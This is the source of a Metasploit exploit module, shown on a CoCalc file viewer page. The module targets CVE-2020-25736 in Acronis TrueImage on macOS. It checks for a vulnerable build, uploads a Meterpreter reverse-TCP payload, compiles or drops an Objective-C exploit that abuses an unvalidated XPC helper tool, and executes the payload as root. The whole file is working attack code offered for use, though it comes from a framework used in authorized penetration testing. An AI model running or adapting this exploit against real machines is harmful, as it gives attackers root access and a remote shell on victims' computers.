CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/osx/local/acronis_trueimage_xpc_privesc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Common10include Msf::Post::Process11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Acronis TrueImage XPC Privilege Escalation',20'Description' => %q{21Acronis TrueImage versions 2019 update 1 through 2021 update 122are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`23helper tool does not perform any validation on connecting clients,24which gives arbitrary clients the ability to execute functions provided25by the helper tool with `root` privileges.26},27'License' => MSF_LICENSE,28'Author' => [29'Csaba Fitzl', # @theevilbit - Vulnerability Discovery30'Shelby Pace' # Metasploit Module and Objective-c code31],32'Platform' => [ 'osx' ],33'Arch' => [ ARCH_X64 ],34'SessionTypes' => [ 'shell', 'meterpreter' ],35'Targets' => [[ 'Auto', {} ]],36'Privileged' => true,37'References' => [38[ 'CVE', '2020-25736' ],39[ 'URL', 'https://kb.acronis.com/content/68061' ],40[ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]41],42'DefaultOptions' => {43'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',44'WfsDelay' => 1545},46'DisclosureDate' => '2020-11-11',47'DefaultTarget' => 0,48'Notes' => {49'Stability' => [ CRASH_SAFE ],50'Reliability' => [ REPEATABLE_SESSION ],51'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]52}53)54)5556register_options([57OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),58OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),59OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])60])61end6263def tmp_dir64datastore['WRITABLE_DIR'].to_s65end6667def sys_shell68datastore['SHELL'].to_s69end7071def compile72datastore['COMPILE']73end7475def compile_on_target?76return false if compile == 'False'7778if compile == 'Auto'79ret = cmd_exec('xcode-select -p')80return false if ret.include?('error: unable')81end8283true84end8586def exp_file_name87@exp_file_name ||= Rex::Text.rand_text_alpha(5..10)88end8990def check91helper_location = '/Library/PrivilegedHelperTools'92helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]93plist = '/Applications/Acronis True Image.app/Contents/Info.plist'9495unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }96return CheckCode::Safe97end9899return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)100101plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"102build_no = cmd_exec(plutil_cmd)103return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?104105build_no = build_no.to_i106vprint_status("Found build #{build_no}")107return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610108109CheckCode::Safe('Acronis version found is not vulnerable')110end111112def exploit113payload_name = Rex::Text.rand_text_alpha(7)114@payload_path = "#{tmp_dir}/#{payload_name}"115116print_status("Attempting to write payload at #{@payload_path}")117unless upload_and_chmodx(@payload_path, generate_payload_exe)118fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')119end120vprint_good("Successfully wrote payload at #{@payload_path}")121122@pid = get_valid_pid123exp_bin_path = "#{tmp_dir}/#{exp_file_name}"124125if compile_on_target?126exp_src = "#{exp_file_name}.m"127exp_path = "#{tmp_dir}/#{exp_src}"128compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"129130unless write_file(exp_path, objective_c_code)131fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')132end133register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)134135ret = cmd_exec(compile_cmd)136fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?137138print_status("Successfully compiled #{exp_src}...Now executing payload")139else140print_status("Using pre-compiled exploit #{exp_bin_path}")141compiled_exploit = compiled_exp142unless upload_and_chmodx(exp_bin_path, compiled_exploit)143fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')144end145146register_files_for_cleanup(exp_bin_path, @payload_path)147end148149cmd_exec(exp_bin_path)150end151152def objective_c_code153file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')154ERB.new(file_contents).result(binding)155rescue Errno::ENOENT156fail_with(Failure::NotFound, 'ERB payload file not found')157end158159def compiled_exp160compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')161compiled.gsub!('/tmp/payload', @payload_path)162compiled.gsub!('/bin/zsh', sys_shell)163compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))164165compiled166end167168def get_valid_pid169procs = get_processes170return '1' if procs.empty?171172len = procs.length173rand_proc = procs[rand(1...len)]174return '1' if rand_proc['pid'].to_s.blank?175176rand_proc['pid'].to_s177end178end179180181